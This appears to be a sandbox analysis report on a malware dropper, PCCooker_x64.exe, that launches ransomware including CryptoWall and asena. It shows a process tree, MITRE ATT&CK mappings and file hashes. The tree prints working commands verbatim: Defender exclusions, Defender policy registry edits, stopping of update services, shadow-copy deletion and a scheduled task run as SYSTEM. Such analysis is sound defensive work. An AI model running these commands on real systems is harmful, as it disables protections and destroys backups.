PID 2368 wrote to memory of 3032	2368	PCCooker_x64.exe	4363463463464363463463463.exe
PID 2368 wrote to memory of 3032	2368	PCCooker_x64.exe	4363463463464363463463463.exe
PID 2368 wrote to memory of 3032	2368	PCCooker_x64.exe	4363463463464363463463463.exe
PID 2368 wrote to memory of 3036	2368	PCCooker_x64.exe	a76e49df84ba2a7b33e8ea959995b5e6faecb90d551ef169d8272ce9042c35a5.exe
PID 2368 wrote to memory of 3036	2368	PCCooker_x64.exe	a76e49df84ba2a7b33e8ea959995b5e6faecb90d551ef169d8272ce9042c35a5.exe
PID 2368 wrote to memory of 3036	2368	PCCooker_x64.exe	a76e49df84ba2a7b33e8ea959995b5e6faecb90d551ef169d8272ce9042c35a5.exe
PID 2368 wrote to memory of 3036	2368	PCCooker_x64.exe	a76e49df84ba2a7b33e8ea959995b5e6faecb90d551ef169d8272ce9042c35a5.exe
PID 2368 wrote to memory of 2516	2368	PCCooker_x64.exe	asena.exe
PID 2368 wrote to memory of 2516	2368	PCCooker_x64.exe	asena.exe
PID 2368 wrote to memory of 2516	2368	PCCooker_x64.exe	asena.exe
PID 2368 wrote to memory of 2516	2368	PCCooker_x64.exe	asena.exe
PID 2368 wrote to memory of 2712	2368	PCCooker_x64.exe	Bomb.exe
PID 2368 wrote to memory of 2712	2368	PCCooker_x64.exe	Bomb.exe
PID 2368 wrote to memory of 2712	2368	PCCooker_x64.exe	Bomb.exe
PID 2368 wrote to memory of 2712	2368	PCCooker_x64.exe	Bomb.exe
PID 2368 wrote to memory of 2764	2368	PCCooker_x64.exe	CryptoWall.exe
PID 2368 wrote to memory of 2764	2368	PCCooker_x64.exe	CryptoWall.exe
PID 2368 wrote to memory of 2764	2368	PCCooker_x64.exe	CryptoWall.exe
PID 2368 wrote to memory of 2764	2368	PCCooker_x64.exe	CryptoWall.exe
PID 2764 wrote to memory of 2624	2764	CryptoWall.exe	explorer.exe
PID 2764 wrote to memory of 2624	2764	CryptoWall.exe	explorer.exe
PID 2764 wrote to memory of 2624	2764	CryptoWall.exe	explorer.exe
PID 2764 wrote to memory of 2624	2764	CryptoWall.exe	explorer.exe
PID 2516 wrote to memory of 2892	2516	asena.exe	wmic.exe
PID 2516 wrote to memory of 2892	2516	asena.exe	wmic.exe
PID 2516 wrote to memory of 2892	2516	asena.exe	wmic.exe
PID 2516 wrote to memory of 2892	2516	asena.exe	wmic.exe
PID 2516 wrote to memory of 2228	2516	asena.exe	vssadmin.exe
PID 2516 wrote to memory of 2228	2516	asena.exe	vssadmin.exe
PID 2516 wrote to memory of 2228	2516	asena.exe	vssadmin.exe
PID 2516 wrote to memory of 2228	2516	asena.exe	vssadmin.exe
PID 2624 wrote to memory of 2088	2624	explorer.exe	svchost.exe
PID 2624 wrote to memory of 2088	2624	explorer.exe	svchost.exe
PID 2624 wrote to memory of 2088	2624	explorer.exe	svchost.exe
PID 2624 wrote to memory of 2088	2624	explorer.exe	svchost.exe
PID 2624 wrote to memory of 620	2624	explorer.exe	vssadmin.exe
PID 2624 wrote to memory of 620	2624	explorer.exe	vssadmin.exe
PID 2624 wrote to memory of 620	2624	explorer.exe	vssadmin.exe
PID 2624 wrote to memory of 620	2624	explorer.exe	vssadmin.exe
PID 2712 wrote to memory of 2288	2712	Bomb.exe	25.exe
PID 2712 wrote to memory of 2288	2712	Bomb.exe	25.exe
PID 2712 wrote to memory of 2288	2712	Bomb.exe	25.exe
PID 2712 wrote to memory of 820	2712	Bomb.exe	24.exe
PID 2712 wrote to memory of 820	2712	Bomb.exe	24.exe
PID 2712 wrote to memory of 820	2712	Bomb.exe	24.exe
PID 2712 wrote to memory of 2144	2712	Bomb.exe	23.exe
PID 2712 wrote to memory of 2144	2712	Bomb.exe	23.exe
PID 2712 wrote to memory of 2144	2712	Bomb.exe	23.exe
PID 2712 wrote to memory of 348	2712	Bomb.exe	22.exe
PID 2712 wrote to memory of 348	2712	Bomb.exe	22.exe
PID 2712 wrote to memory of 348	2712	Bomb.exe	22.exe
PID 2712 wrote to memory of 1140	2712	Bomb.exe	21.exe
PID 2712 wrote to memory of 1140	2712	Bomb.exe	21.exe
PID 2712 wrote to memory of 1140	2712	Bomb.exe	21.exe
PID 2712 wrote to memory of 824	2712	Bomb.exe	20.exe
PID 2712 wrote to memory of 824	2712	Bomb.exe	20.exe
PID 2712 wrote to memory of 824	2712	Bomb.exe	20.exe
PID 2712 wrote to memory of 776	2712	Bomb.exe	19.exe
PID 2712 wrote to memory of 776	2712	Bomb.exe	19.exe
PID 2712 wrote to memory of 776	2712	Bomb.exe	19.exe
PID 2712 wrote to memory of 1172	2712	Bomb.exe	18.exe
PID 2712 wrote to memory of 1172	2712	Bomb.exe	18.exe
PID 2712 wrote to memory of 1172	2712	Bomb.exe	18.exe

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\PCCooker_x64.exe
"C:\Users\Admin\AppData\Local\Temp\PCCooker_x64.exe"
1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2368
- C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
  "C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID:3032
- - C:\Users\Admin\AppData\Local\Temp\Files\t2.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\t2.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    PID:3044
  - - C:\Windows\sysklnorbcv.exe
      C:\Windows\sysklnorbcv.exe
      4⤵
      Executes dropped EXE
      PID:3216
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
        5⤵
        
        PID:4720
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3808
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS
        5⤵
        
        PID:5092
      - C:\Windows\SysWOW64\sc.exe
        
        sc stop UsoSvc
        6⤵
        Launches sc.exe
        
        PID:3740
      - C:\Windows\SysWOW64\sc.exe
        
        sc stop WaaSMedicSvc
        6⤵
        Launches sc.exe
        
        PID:4580
      - C:\Windows\SysWOW64\sc.exe
        
        sc stop wuauserv
        6⤵
        Launches sc.exe
        
        PID:4836
      - C:\Windows\SysWOW64\sc.exe
        
        sc stop DoSvc
        6⤵
        Launches sc.exe
        
        PID:4964
      - C:\Windows\SysWOW64\sc.exe
        
        sc stop BITS
        6⤵
        Launches sc.exe
        
        PID:4256
- - C:\Users\Admin\AppData\Local\Temp\Files\file1.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\file1.exe"
    3⤵
    - Drops startup file
    - Executes dropped EXE
    PID:2004
  - - C:\Users\Admin\Pictures\nn751smCfRqJS6L8DIVKWPBb.exe
      "C:\Users\Admin\Pictures\nn751smCfRqJS6L8DIVKWPBb.exe"
      4⤵
      Executes dropped EXE
      PID:3736
  - - C:\Users\Admin\Pictures\KkzAHHDHGzl2WEViN372wVfj.exe
      "C:\Users\Admin\Pictures\KkzAHHDHGzl2WEViN372wVfj.exe"
      4⤵
      PID:3256
    - - C:\Users\Admin\AppData\Local\Temp\7zSE4E3.tmp\Install.exe
        
        .\Install.exe
        5⤵
        
        PID:3312
      - C:\Users\Admin\AppData\Local\Temp\7zSE743.tmp\Install.exe
        
        .\Install.exe /wdidxQ "385104" /S
        6⤵
        
        PID:4896
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        7⤵
        
        PID:4008
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
        8⤵
        Indirect Command Execution
        
        PID:4592
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        9⤵
        
        PID:628
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        10⤵
        
        PID:3296
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
        8⤵
        Indirect Command Execution
        
        PID:4480
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        9⤵
        
        PID:4792
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        10⤵
        
        PID:3580
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
        8⤵
        Indirect Command Execution
        
        PID:3880
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        9⤵
        
        PID:3280
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        10⤵
        
        PID:4884
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
        8⤵
        Indirect Command Execution
        
        PID:3516
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        9⤵
        
        PID:3208
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        10⤵
        
        PID:3936
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        8⤵
        Indirect Command Execution
        
        PID:4460
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        9⤵
        
        PID:3684
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        10⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4836
        
        C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        11⤵
        
        PID:2216
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        7⤵
        Indirect Command Execution
        
        PID:3788
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        8⤵
        
        PID:4956
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5060
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        10⤵
        
        PID:10464
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bHuqaEPbhrVtHIaGbF" /SC once /ST 22:04:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\FuIjCdrlnqMUsEOBh\RPUgVTHHmvZBwzx\rfRIkpM.exe\" wW /JrJzdidz 385104 /S" /V1 /F
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:8972
- - C:\Users\Admin\AppData\Local\Temp\Files\random.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\random.exe"
    3⤵
    PID:3604
  - - C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
      4⤵
      PID:3680
    - - C:\Users\Admin\AppData\Local\Temp\1000023001\b844c761f2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000023001\b844c761f2.exe"
        5⤵
        
        PID:9056
    - - C:\Users\Admin\1000026002\2417efec43.exe
        
        "C:\Users\Admin\1000026002\2417efec43.exe"
        5⤵
        
        PID:9760
- - C:\Users\Admin\AppData\Local\Temp\Files\npp.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\npp.exe"
    3⤵
    PID:4632
  - - C:\Users\Admin\AppData\Local\Temp\2185524414.exe
      C:\Users\Admin\AppData\Local\Temp\2185524414.exe
      4⤵
      PID:3196
    - - C:\Users\Admin\sysblvrvcr.exe
        
        C:\Users\Admin\sysblvrvcr.exe
        5⤵
        
        PID:7568
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
        6⤵
        
        PID:8048
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:8000
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait
        6⤵
        
        PID:7332
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop UsoSvc
        7⤵
        Launches sc.exe
        
        PID:7912
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop WaaSMedicSvc
        7⤵
        Launches sc.exe
        
        PID:10164
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop wuauserv
        7⤵
        Launches sc.exe
        
        PID:10196
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop DoSvc
        7⤵
        Launches sc.exe
        
        PID:6156
        
        C:\Windows\SysWOW64\sc.exe
        
        sc stop BITS /wait
        7⤵
        Launches sc.exe
        
        PID:5648
- - C:\Users\Admin\AppData\Local\Temp\Files\a.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\a.exe"
    3⤵
    PID:4136
  - - C:\Windows\sysmablsvr.exe
      C:\Windows\sysmablsvr.exe
      4⤵
      PID:4608
- - C:\Users\Admin\AppData\Local\Temp\Files\twztl.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\twztl.exe"
    3⤵
    PID:540
  - - C:\Windows\sysblvrvcr.exe
      C:\Windows\sysblvrvcr.exe
      4⤵
      PID:4104
- - C:\Users\Admin\AppData\Local\Temp\Files\Ukodbcdcl.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\Ukodbcdcl.exe"
    3⤵
    PID:688
- - C:\Users\Admin\AppData\Local\Temp\Files\66ebe621bc80b_ffile.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\66ebe621bc80b_ffile.exe"
    3⤵
    PID:5112
- - C:\Users\Admin\AppData\Local\Temp\Files\66c45b187f9fb_RobertsonGlory.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\66c45b187f9fb_RobertsonGlory.exe"
    3⤵
    PID:10404
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k move Injuries Injuries.cmd & Injuries.cmd & exit
      4⤵
      PID:10860
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        
        PID:5320
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "wrsa.exe opssvc.exe"
        5⤵
        
        PID:3740
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        
        PID:3968
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe"
        5⤵
        
        PID:3888
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 253462
        5⤵
        
        PID:10956
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "MPEGWARNINGTHOMPSONCONTRIBUTION" Herein
        5⤵
        
        PID:6372
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Misc + ..\Allowance + ..\Porn + ..\Recover + ..\Kept + ..\Physician + ..\Intervention l
        5⤵
        
        PID:4272
    - - C:\Users\Admin\AppData\Local\Temp\253462\Phys.pif
        
        Phys.pif l
        5⤵
        
        PID:9268
    - - C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        5⤵
        
        PID:6520
- C:\Users\Admin\AppData\Local\Temp\a76e49df84ba2a7b33e8ea959995b5e6faecb90d551ef169d8272ce9042c35a5.exe
  "C:\Users\Admin\AppData\Local\Temp\a76e49df84ba2a7b33e8ea959995b5e6faecb90d551ef169d8272ce9042c35a5.exe"
  2⤵
  - Executes dropped EXE
  PID:3036
- C:\Users\Admin\AppData\Local\Temp\asena.exe
  "C:\Users\Admin\AppData\Local\Temp\asena.exe"
  2⤵
  - Executes dropped EXE
  - Enumerates connected drives
  - Writes to the Master Boot Record (MBR)
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2516
- - C:\Windows\System32\Wbem\wmic.exe
    wmic.exe shadowcopy delete
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2892
- - C:\Windows\system32\vssadmin.exe
    vssadmin delete shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:2228
- C:\Users\Admin\AppData\Local\Temp\Bomb.exe
  "C:\Users\Admin\AppData\Local\Temp\Bomb.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2712
- - C:\Users\Admin\AppData\Local\Temp\25.exe
    "C:\Users\Admin\AppData\Local\Temp\25.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:2288
- - C:\Users\Admin\AppData\Local\Temp\24.exe
    "C:\Users\Admin\AppData\Local\Temp\24.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:820
- - C:\Users\Admin\AppData\Local\Temp\23.exe
    "C:\Users\Admin\AppData\Local\Temp\23.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:2144
- - C:\Users\Admin\AppData\Local\Temp\22.exe
    "C:\Users\Admin\AppData\Local\Temp\22.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:348
- - C:\Users\Admin\AppData\Local\Temp\21.exe
    "C:\Users\Admin\AppData\Local\Temp\21.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:1140
- - C:\Users\Admin\AppData\Local\Temp\20.exe
    "C:\Users\Admin\AppData\Local\Temp\20.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:824
- - C:\Users\Admin\AppData\Local\Temp\19.exe
    "C:\Users\Admin\AppData\Local\Temp\19.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:776
- - C:\Users\Admin\AppData\Local\Temp\18.exe
    "C:\Users\Admin\AppData\Local\Temp\18.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:1172
- - C:\Users\Admin\AppData\Local\Temp\17.exe
    "C:\Users\Admin\AppData\Local\Temp\17.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:584
- - C:\Users\Admin\AppData\Local\Temp\16.exe
    "C:\Users\Admin\AppData\Local\Temp\16.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:2256
- - C:\Users\Admin\AppData\Local\Temp\15.exe
    "C:\Users\Admin\AppData\Local\Temp\15.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:656
- - C:\Users\Admin\AppData\Local\Temp\14.exe
    "C:\Users\Admin\AppData\Local\Temp\14.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:2072
- - C:\Users\Admin\AppData\Local\Temp\13.exe
    "C:\Users\Admin\AppData\Local\Temp\13.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:1184
- - C:\Users\Admin\AppData\Local\Temp\12.exe
    "C:\Users\Admin\AppData\Local\Temp\12.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:2700
- - C:\Users\Admin\AppData\Local\Temp\11.exe
    "C:\Users\Admin\AppData\Local\Temp\11.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:3024
- - C:\Users\Admin\AppData\Local\Temp\10.exe
    "C:\Users\Admin\AppData\Local\Temp\10.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:2980
- - C:\Users\Admin\AppData\Local\Temp\9.exe
    "C:\Users\Admin\AppData\Local\Temp\9.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:2900
- - C:\Users\Admin\AppData\Local\Temp\8.exe
    "C:\Users\Admin\AppData\Local\Temp\8.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:3004
- - C:\Users\Admin\AppData\Local\Temp\7.exe
    "C:\Users\Admin\AppData\Local\Temp\7.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:2876
- - C:\Users\Admin\AppData\Local\Temp\6.exe
    "C:\Users\Admin\AppData\Local\Temp\6.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:2988
- - C:\Users\Admin\AppData\Local\Temp\5.exe
    "C:\Users\Admin\AppData\Local\Temp\5.exe"
    3⤵
    - Executes dropped EXE
    PID:1860
- - C:\Users\Admin\AppData\Local\Temp\4.exe
    "C:\Users\Admin\AppData\Local\Temp\4.exe"
    3⤵
    - Executes dropped EXE
    PID:860
- - C:\Users\Admin\AppData\Local\Temp\3.exe
    "C:\Users\Admin\AppData\Local\Temp\3.exe"
    3⤵
    - Executes dropped EXE
    PID:1200
- - C:\Users\Admin\AppData\Local\Temp\2.exe
    "C:\Users\Admin\AppData\Local\Temp\2.exe"
    3⤵
    - Executes dropped EXE
    PID:2840
- - C:\Users\Admin\AppData\Local\Temp\1.exe
    "C:\Users\Admin\AppData\Local\Temp\1.exe"
    3⤵
    - Executes dropped EXE
    PID:2584
- C:\Users\Admin\AppData\Local\Temp\CryptoWall.exe
  "C:\Users\Admin\AppData\Local\Temp\CryptoWall.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of WriteProcessMemory
  PID:2764
- - C:\Windows\syswow64\explorer.exe
    "C:\Windows\syswow64\explorer.exe"
    3⤵
    - Drops startup file
    - Adds Run key to start application
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of WriteProcessMemory
    PID:2624
  - - C:\Windows\syswow64\svchost.exe
      -k netsvcs
      4⤵
      System Location Discovery: System Language Discovery
      PID:2088
  - - C:\Windows\syswow64\vssadmin.exe
      vssadmin.exe Delete Shadows /All /Quiet
      4⤵
      System Location Discovery: System Language Discovery
      Interacts with shadow copies
      PID:620

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2632

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Windows Management Instrumentation

T1047

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Pre-OS Boot

T1542

Bootkit

T1542.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Direct Volume Access

T1006

Impair Defenses

T1562

Indicator Removal

T1070

File Deletion

T1070.004

Indirect Command Execution

T1202

Modify Registry

T1112

Pre-OS Boot

T1542

Bootkit

T1542.003

Credential Access

Discovery

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Inhibit System Recovery

T1490

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt

Filesize
27KB

MD5
3f7647ac78c5ce358f60ecf67a6e89e8

SHA1
dacb4c22217c28c1738d4f0d41694836a297a7e5

SHA256
8affc6f0fed9408a874f5077f96068daa2683b96e0474fe037b557a0a23548a8

SHA512
0b8a31deccfdc65435008d6aa963ae926de5b4e110ee0a7db441f0e91603508875407b851d9de53901bc27766635efc61c1937c642e83a153918f0db61b0b260

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\1033\GRAPH_F_COL.HXK

Filesize
635B

MD5
11b5396b10c76c3b6dfd7eb8aa2b4957

SHA1
03033138ff0c1ad5dd73b20696b46e59540632af

SHA256
953e06bb8a51a10ca15a594ed7fee78fa204f026c5cba73b4ef83c47bcd59638

SHA512
0ccb2ae5e5ed05400fbe3564a19d13e386f10ccde5f4cebba73841fdf573c50fdff63f53fae1ddf30caa040aac7c62b159ec216587ac57937c34e3a7890974ae

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\1033\GRAPH_K_COL.HXK

Filesize
634B

MD5
59f8abe66ee3d7d604e19fac3ecb6395

SHA1
8153c8896951ba9e6e19e0dd84dc207d6332afbf

SHA256
01d8f6ba217d1ac3856dd62181a4b3a78749fb3efc39c8d17360ccf75152c98b

SHA512
39c0bcabb739daa09b6e7e4fd81ea977821181f7c12d3f2db31d4db82369458f95dfe73ba16ef387fb5fac27b1a9416d2fdbbe1770f0832579037c3db55e2c35

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Biscay\TAB_OFF.GIF

